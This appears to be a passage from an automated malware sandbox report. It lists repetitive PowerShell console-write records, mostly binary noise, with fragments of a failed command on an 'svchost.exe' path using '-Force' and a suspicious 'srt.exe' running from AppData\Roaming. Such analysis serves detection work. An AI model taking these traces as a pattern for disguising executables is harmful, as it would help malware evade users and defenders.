                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............................W.......................0......./.......................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................................................0.......;...............|.......h...............Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................................................0.......;.......................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G...............".......h...............Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....................................................0.......G.......................h...............Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P............................._.......................0.......S.......................h...............Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................|...............................0.......S.......................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_.......-.F.o.r.c.e.....................|...............................0......._.......................h...............Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....................x.......@.......................0......._.......................h...............Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....................x...............................0.......k.......................h...............Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....................x...............................0.......k.......................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......h...............Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....................H.......i.......................0.......w.......................h...............Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................x...............................0.......................l.......h...............Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................x...............................0...............................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................................................0...............................h...............Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................0...............................h...............Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................................................0.......#.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................`...............................0.......#.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P............................./.......................0......./.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................`.......\.......................0......./.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................................................0.......;...............|.......................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................................................0.......;.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G...............".......................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.............................G.......................0.......G.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................................................0.......S.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................`...............................0.......S.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_.......6.9.8.9.\.s.v.c.h.o.s.t...e.x.e. .-.F.o.r.c.e...................0......._.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............................B.......................0......._.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....................................................0.......k.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....................................................0.......k.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.............................e.......................0.......w.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................0.......................l.......................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`...............................0...............................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................................................0...............................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................3.......................0...............................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................`...............................0.......#.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............................0.......................0.......#.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................`.......h.......................0......./.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................`...............................0......./.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................................................0.......;...............|.......................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................`.......6.......................0.......;.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......f.......................0.......G...............".......................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....................`...............................0.......G.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................................................0.......S.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................l...............................0.......S.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_.......-.F.o.r.c.e.....................`...............................0......._.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....................`...............................0......._.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....................l.......L.......................0.......k.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....................l.......g.......................0.......k.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....................l...............................0.......w.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................0.......................l.......................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................0...............................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................l.......&.......................0...............................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................l.......E.......................0...............................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....D...............`.......<.......................0.......#.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....D...............`.......b.......................0.......#.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....D...............................................0......./.......................8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....D...............................................0......./.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....D...............................................0.......;...............|.......8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....D...............................................0.......;.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......<.......................0.......G...............".......8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....D...............`.......^.......................0.......G.......................8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....D...............l...............................0.......S.......................8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....D...............`...............................0.......S.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_.......6.9.8.9.\.s.v.c.h.o.s.t...e.x.e. .-.F.o.r.c.e...................0......._.......................8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....D...............................................0......._.......................8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....D.......................G.......................0.......k.......................8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....D.......................b.......................0.......k.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....D...............`...............................0.......w.......................8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....D...............`...............................0.......................l.......8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....D...............`...............................0...............................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....D...............`......./.......................0...............................8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....D...............`.......K.......................0...............................8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............@.......D.......3.......................0.......#.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............@.......t.......X.......................0.......#.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............@.......X...............................0......./.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............@.......X...............................0......./.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............@.......t...............................0.......;...............|.......................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............@.......@...............................0.......;.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......=.......................0.......G...............".......................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.............@.......@.......].......................0.......G.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............@.......@...............................0.......S.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............@.......@...............................0.......S.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............@.......t...............................0......._.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............@.......t...............................0......._.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k.......d...e.x.e. .-.F.o.r.c.e.@.......@.......7.......................0.......k.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............@.......X.......Y.......................0.......k.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.............@.......X...............................0.......w.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.............@.......................................0.......w.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......................2.......................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............@.......................................0...............................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............@...............(.......................0.......................l.......................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............@...............C.......................0...............................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............@...............m.......................0...............................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............@.......................................0...............................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................................................0.......#.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................................................0.......#.......H...............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................................................0......./.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................@...............................0......./.......H...............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................@.......3.......................0.......;...............|.......................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................@.......[.......................0.......;.......H...............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G.......H.......".......................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....................@...............................0.......G.......H...............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................@...............................0.......S.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................@...............................0.......S.......H...............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_.......6.9.8.9.\.s.v.c.h.o.s.t...e.x.e. .-.F.o.r.c.e...................0......._.......H...............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............................8.......................0......._.......H...............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............................v.......................0.......k.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....................................................0.......k.......H...............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.......H.......2.......................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....................@...............................0.......w.......H...............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................@...............................0.......................l.......................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................@.......2.......................0...............H...............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............................].......................0...............H...............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................x.......................0...............H...............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................................................0.......#.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................................................0.......#.......8.v.............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................@...............................0......./.......................h...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................................................0......./.......8.v.............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............................T.......................0.......;...............|.......h...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................@.......u.......................0.......;.......8.v.............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G.......8.v.....".......h...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....................@...............................0.......G.......8.v.............h...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................................................0.......S.......................h...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............................Q.......................0.......S.......8.v.............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....................................................0......._.......................h...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....................@...............................0......._.......8.v.............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k.......d...e.x.e. .-.F.o.r.c.e.........................................0.......k.......8.v.............h...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....................................................0.......k.......8.v.............h...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.............................3.......................0.......w.......................h...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.............................N.......................0.......w.......8.v.............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0...............8.v.....2.......h...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................0...............8.v.............h...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................0.......................l.......h...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................(.......................0...............8.v.............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............................U.......................0...............8.v.............h...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................}.......................0...............8.v.............h...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............l...............R.......................0.......#.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............l.......................................0.......#.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............l.......................................0......./.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............l.......................................0......./.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............l.......................................0.......;...............|.......................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............l...............#.......................0.......;.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......O.......................0.......G...............".......................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.............l...............l.......................0.......G.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............l.......................................0.......S.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............l.......................................0.......S.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_.......6.9.8.9.\.s.v.c.h.o.s.t...e.x.e. .-.F.o.r.c.e...................0......._.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............l.......................................0......._.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............l.......X...............................0.......k.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............l...............=.......................0.......k.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.............l.......X...............................0.......w.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............l.......X...............................0.......................l.......................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............l.......X...............................0...............................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............l.......................................0...............................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............l...............;.......................0...............................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............P.......|...............................0.......#.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............P.......|...............................0.......#.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............P...............9.......................0......./.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............P...............X.......................0......./.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............P.......8...............................0.......;...............|.......................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............P.......|...............................0.......;.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G...............".......................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.............P.......8...............................0.......G.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............P.......8...............................0.......S.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............P...............<.......................0.......S.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............P.......|.......t.......................0......._.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............P.......8...............................0......._.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k.......d...e.x.e. .-.F.o.r.c.e.P.......8...............................0.......k.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............P.......8...............................0.......k.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.............P.......8...............................0.......w.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.............P.......8.......,.......................0.......w.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......................2.......................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............P.......@...............................0...............................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............P.......@...............................0.......................l.......................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............P.......|...............................0...............................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............P.......8...............................0...............................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............P.......|.......5.......................0...............................................
                      Source: C:\Users\user\AppData\Roaming\srt.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllJump to behavior
